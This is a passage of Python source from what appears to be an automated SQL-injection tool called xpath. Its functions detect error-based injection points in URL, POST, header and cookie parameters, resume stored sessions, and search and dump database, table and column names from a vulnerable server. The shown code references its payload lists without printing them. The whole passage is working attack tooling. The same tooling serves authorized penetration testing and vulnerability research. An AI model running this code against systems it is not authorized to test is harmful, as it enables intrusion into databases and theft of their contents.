response = request.inject_payload( url=url, regex=REGEX_TESTS, data=data, headers=headers, use_requests=self._use_requests, proxy=self._proxy, ) except KeyboardInterrupt as e: question = logger.read_input( "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] " ) if question and question == "e": end_detection_phase = True break if question and question == "s": break if question and question == "n": next_param_test = True break if question and question.lower() == "q": logger.error("user quit") logger.end("ending") sys.exit(0) except Exception as e: unknown_error_counter += 1 else: if response.ok: is_injected = True successful_payload_prefix = prefix _ = session.generate( session_filepath=self._session_filepath) with open(self._target_file, "w") as fd: fd.write( f"{self.url} ({'GET' if 'cookie' in injection_type.lower() else injection_type}) # {' '.join(sys.argv)}" ) if param: message = f"{injection_type} parameter '{DIM}{white}{param}{BRIGHT}{black}' is '{DIM}{white}{title}{BRIGHT}{black}' injectable" else: message = f"{injection_type} parameter is '{DIM}{white}{title}{BRIGHT}{black}' injectable" logger.notice(message) vulns.append({ "injection_type": f"({injection_type})", "attempts": attemps_counter, "payload": payload, "title": title, "order": order, "regex": regex, "injected_param": injectable_param.replace("*", ""), "dbms": dbms, }) _ = session.dump( session_filepath=self._session_filepath, query=PAYLOAD_STATEMENT, values=( str(title), order, attemps_counter, payload, injection_type, regex, "test", injectable_param, dbms, ), ) vulnerable_param = param break index += 1 if end_detection_phase or next_param_test: break if not is_injected: _param = f"{DIM}{white}'{param}'{BRIGHT}{black}" logger.notice( f"{injection_type} parameter {_param} does not seem to be injectable" ) if end_detection_phase: if not is_injected: logger.critical( "all tested parameters do not appear to be injectable" ) break if is_injected and not next_param_test: if vulnerable_param: message = f"{injection_type} parameter '{vulnerable_param}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] " else: message = f"{injection_type} parameter is vulnerable. Do you want to keep testing the others (if any)? [y/N] " question = logger.read_input(message, batch=self._batch, user_input="N") if question and question == "n": break else: logger.debug( "skipping tests as we already have injected the target..") if vulns and isinstance(vulns, list): vulns = sorted( vulns, key=lambda k: k.get("order") if k.get("order") else k.get("payload_order"), reverse=True, ) dbms = vulns[0].get("dbms") injection_type = vulns[0].get("injection_type") injected_param = vulns[0].get("injected_param") recommended_payload = vulns[0].get("payload") recommended_payload = clean_up_payload( payload=recommended_payload, replaceable_string="0x72306f746833783439") recommended_payload_type = vulns[0].get("regex") param = injected_param if not param and self.headers: params = extract_params(self.headers, injection_type=injection_type) payload = prepare_injection_payload(self.headers, recommended_payload, param="").replace( "%20", " ") param = "" for p in params: sep = ": " if "header" in injection_type.lower() else "=" _param = f"{p.get('key')}{sep}{p.get('value').replace('*', '')}" _ = f"{_param}{recommended_payload}" if _ in payload.strip(): param = _param break if not is_resumed: message = f"xpath identified the following injection point(s) with a total of {attemps_counter} HTTP(s) requests:" if is_resumed: message = "xpath resumed the following injection point(s) from stored session:" logger.success(message) if param: sep = ":" if "header" in injection_type.lower() else "=" _param = param.split(sep)[0] if sep in param else param injection_type = f"{_param} {injection_type}" logger.success(f"---\nParameter: {injection_type}") text = " Type: error-based\n Title: {title}\n Payload: {_payload}" ok = [] for v in vulns: title = v.get("title").strip() pl = v.get("payload").strip() if pl[0].lower() in ["a", "o"]: pl = f" {pl}" if param and "HEADER" not in injection_type.upper(): pl = f"{param}{pl}" ok.append(text.format(title=title, _payload=pl)) logger.success("\n\n".join(ok)) logger.success("---") resp = Response( is_vulnerable=True, payloads=vulns, dbms=dbms, filepath=self._filepath, cookies=set_cookie, headers=set_headers, injected_param=injected_param, injection_type=self._injection_type, session_filepath=self._session_filepath, recommended_payload=recommended_payload, recommended_payload_type=recommended_payload_type, ) else: resp = Response( is_vulnerable=False, dbms=dbms, payloads=vulns, filepath=None, cookies=set_cookie, headers=set_headers, injected_param=None, session_filepath=None, injection_type=None, recommended_payload=None, recommended_payload_type=None, ) return resp
def search(self, db="", tbl="", col="", search_type=""): index = 0 _temp = [] is_resumed = False fetched_data = {} SearchResponse = collections.namedtuple( "SearchResponse", ["fetched", "count", "results"], ) if self._dbms and self._dbms == "PostgreSQL": logger.warning(f"Search is not implemeted yet for PostgreSQL..") return SearchResponse(fetched=False, count=0, results=[]) payloads = self._search_payloads(db=db, tbl=tbl, col=col, search_type=search_type) self._table_search = payloads.table_to_generate try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=self._table_search, cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass remainder = 0 retval = self._extact(payloads=payloads.for_count) if retval.is_injected: found_records = int(retval.result) logger.info("used SQL query returns %d entries" % (found_records)) if found_records == 0: if search_type == "database": logger.warning(f"no databases LIKE '{db}' found") if search_type == "table": if not db: logger.warning( f"no databases have tables LIKE '{tbl}'") if db: logger.warning( f"no tables LIKE '{tbl}' in database '{db}'") logger.warning( f"no databases contain any of the provided tables") if search_type == "column": if not tbl and not db: logger.warning( f"no databases have tables containing columns LIKE '{col}'" ) if not tbl and db: logger.warning( f"no tables contain columns LIKE '{tbl}' in database '{db}'" ) if not db and tbl: logger.warning( f"no databases have tables containing columns LIKE '{col}' for table '{tbl}'" ) if db and tbl: logger.warning( f"unable to retrieve column names for table '{tbl}' in database '{db}'" ) logger.warning( f"no databases have tables containing any of the provided columns" ) return SearchResponse(fetched=False, count=0, results=[]) if is_resumed: for entry in fetched_data: index = entry.get("index") name = entry.get("value") _type = entry.get("search_type") _temp.append(name) logger.info(f"resumed: {name}") if search_type == "column": remainder_value = 3 if search_type == "table": remainder_value = 2 if search_type == "database": remainder_value = 1 remainder = len(fetched_data) % remainder_value fetched_records = _temp _temp = self._format_results(_temp, remainder_value) if remainder > 0: index -= 1 fetched_records = fetched_records[-remainder:] _temp.pop() if remainder > 0: records = self._format_results(fetched_records, remainder_value) else: records = [] should_fetch = True if is_resumed: if index == found_records: should_fetch = False if should_fetch: retval = self._extact(payloads=payloads.for_dump) if retval.is_injected: payload = retval.payload payloads = self._generate_search_dump_payloads( count=found_records, payload=payload, index=index) if not is_resumed: session.generate_table( session_filepath=self.session_filepath, query=TBL_SEARCH.format(name=self._table_search), ) response_data = self._extract_search_results( payloads=payloads, database=db, table=tbl, search_type=search_type, records=records, position=index, ) if response_data.is_fetched: _temp.extend(response_data.result) self._pprint_search_results(search_type, _temp) return SearchResponse(fetched=True, count=found_records, results=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._pprint_search_results(search_type, _temp) return SearchResponse(fetched=True, count=found_records, results=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return SearchResponse(fetched=False, count=0, results=[])
def inject_payload( self, url, regex, data="", headers="", proxy=None, use_requests=False, timeout=30, ): req = prepare_request(url=url, data=data, custom_headers=headers, use_requests=use_requests) raw = req.raw custom_headers = req.headers logger.traffic_out(f"HTTP request:\n{raw}") ok = False text = "" result = "" error = "" status_code = 0 response_url = "" reason = "" headers = {} Response = collections.namedtuple( "Response", [ "ok", "url", "status_code", "text", "result", "headers", "reason", "error" ], ) _temp = Response( ok=ok, url=response_url, status_code=status_code, text=text, result=result, headers=headers, reason=reason, error=error, ) if proxy and proxy.for_urllib and not use_requests: proxy = proxy.for_urllib elif proxy and proxy.for_requests and use_requests: proxy = proxy.for_requests else: proxy = None if not data: try: if not use_requests: opener = compat_opener() if proxy: opener = compat_opener(proxy) opener.addheaders = custom_headers resp = opener.open(url, timeout=timeout) else: resp = requests.get(url, headers=custom_headers, proxies=proxy, timeout=timeout) resp.raise_for_status() except (compat_httperr, requests.exceptions.HTTPError) as e: error_resp = parse_http_error(e) text = error_resp.text headers = error_resp.headers status_code = error_resp.status_code error = error_resp.error reason = error_resp.reason response_url = error_resp.url except compat_urlerr as e: logger.error(e) except KeyboardInterrupt as e: raise e except Exception as e: raise e else: http_response = parse_http_response(resp) headers = http_response.headers text = http_response.text status_code = http_response.status_code reason = http_response.reason response_url = http_response.url if data: try: if not use_requests: data = data.encode("utf-8") opener = compat_opener() if proxy: opener = compat_opener(proxy) opener.addheaders = custom_headers resp = opener.open(url, data, timeout=timeout) else: resp = requests.get( url, data=data, headers=custom_headers, proxies=proxy, timeout=timeout, ) resp.raise_for_status() except (compat_httperr, requests.exceptions.HTTPError) as e: error_resp = parse_http_error(e) text = error_resp.text headers = error_resp.headers status_code = error_resp.status_code error = error_resp.error reason = error_resp.reason response_url = error_resp.url except compat_urlerr as e: logger.error(e) except KeyboardInterrupt as e: raise e except Exception as e: raise e else: http_response = parse_http_response(resp) headers = http_response.headers text = http_response.text status_code = http_response.status_code reason = http_response.reason response_url = http_response.url is_protected = detect_cloudflare_protection(text) if is_protected: result = cloudflare_decode(extract_encoded_data(text)) try: result = result.encode("utf-8") encoding = chardet.detect(result).get("encoding", "utf-8") result = result.decode(encoding) except: pass _temp = Response( ok=True if result else False, url=response_url, status_code=status_code, text="", # text, we can add response html here result=result, error=error, reason=reason, headers=headers, ) if not is_protected: result = search_regex( pattern=regex, string=text, default="", group="xpath_data", ) try: result = result.encode("utf-8") encoding = chardet.detect(result).get("encoding", "utf-8") result = result.decode(encoding) except: pass _temp = Response( ok=True if result else False, url=response_url, status_code=status_code, text="", # text, we can add response html here result=result, error=error, reason=reason, headers=headers, ) raw_response = prepare_response(_temp) logger.traffic_in(f"HTTP Response {raw_response}") return _temp
def tbl_names(self, db=""): index = 0 _temp = [] is_resumed = False fetched_data = {} _temp_payloads = [] TablesResponse = collections.namedtuple( "TablesResponse", ["fetched", "count", "database", "tables"]) if db: dump_payloads = [] [dump_payloads.extend(v) for _, v in PAYLOADS_TBLS_NAMES.items()] encode_string = to_hex(db, dbms=self._dbms) if self._dbms: dump_payloads = PAYLOADS_TBLS_NAMES.get( self._dbms, dump_payloads) for entry in dump_payloads: if self._dbms and self._dbms.startswith("Microsoft"): if "sysobjects" in entry: data = entry.format(db=db.strip(), db1=db.strip()) else: data = entry.format(db=encode_string, db1=encode_string) else: data = entry.format(db=encode_string) _temp_payloads.append(data) try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=db, cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info("fetching tables for database: '%s'" % (db)) retval = self._tbl_count(db=db) if retval.is_injected: tbl_count = int(retval.result) if tbl_count != 0: logger.info("used SQL query returns %d entries" % (tbl_count)) if tbl_count == 0: logger.warning( "used SQL query returns %d entries for database: '%s'" % (tbl_count, db)) return TablesResponse(fetched=False, count=tbl_count, database=db, tables=[]) if is_resumed: for entry in fetched_data: name = entry.get("tblname") if name not in _temp: _temp.append(name) logger.info(f"resumed: '{name}'") index += 1 should_fetch = True if is_resumed: if len(fetched_data) == tbl_count: should_fetch = False if should_fetch: payloads = self._generat_payload(payloads_list=_temp_payloads) retval = self._extact(payloads=payloads) if retval.is_injected: payload = retval.payload payloads = self._generate_tbl_payloads(tbl_count=tbl_count, payload=payload, index=index) if not is_resumed: session.generate_table( session_filepath=self.session_filepath, query=DB_TABLES.format(name=db, tbl_name=db), ) response_data = self._extract_tbls(payloads=payloads, database=db) if response_data.is_fetched: _temp.extend(response_data.result) self._pprint_tables( cursor_or_list=_temp, field_names="Tables", database=db, ) return TablesResponse(fetched=True, count=tbl_count, database=db, tables=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._pprint_tables( cursor_or_list=_temp, field_names="Tables", database=db, ) return TablesResponse(fetched=True, count=tbl_count, database=db, tables=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return TablesResponse(fetched=False, count=0, database="", tables=_temp)
def _parse_target(self): ParamResponse = collections.namedtuple( "ParamResponse", ["params", "injection_type", "is_custom_injection"]) params = [] injection_type = self._injection_type is_custom_injection = False _temp = ParamResponse( params=params, injection_type=injection_type, is_custom_injection=is_custom_injection, ) if (self.headers and self.url and "COOKIE" in injection_type.upper() or "HEADER" in injection_type.upper()): params = extract_params(value=self.headers, injection_type=injection_type) if "*" in self.headers: question = logger.read_input( "custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] ", batch=self._batch, user_input="Y", ) if question and question == "q": logger.error("user quit.") logger.end("ending") sys.exit(0) if question and question == "n": params = params if question == "" or question == "y": is_custom_injection = True injection_type = f"(custom) {injection_type}" if self.data and self.url and "POST" in injection_type.upper(): params = extract_params(value=self.data, injection_type=injection_type) if "*" in self.data: question = logger.read_input( "custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] ", batch=self._batch, user_input="Y", ) if question and question == "q": logger.error("user quit.") logger.end("ending") sys.exit(0) if question and question == "n": params = params if question == "" or question == "y": is_custom_injection = True injection_type = "(custom) POST" if self.url and not self.data and "GET" in injection_type.upper(): params = extract_params(value=self.url, injection_type=injection_type) if "*" in self.url: question = logger.read_input( "custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] ", batch=self._batch, user_input="Y", ) if question and question == "q": logger.error("user quit.") logger.end("ending") sys.exit(0) if question and question == "n": params = params if question == "" or question == "y": is_custom_injection = True injection_type = "URI" if params: _temp = ParamResponse( params=params, injection_type=injection_type, is_custom_injection=is_custom_injection, ) return _temp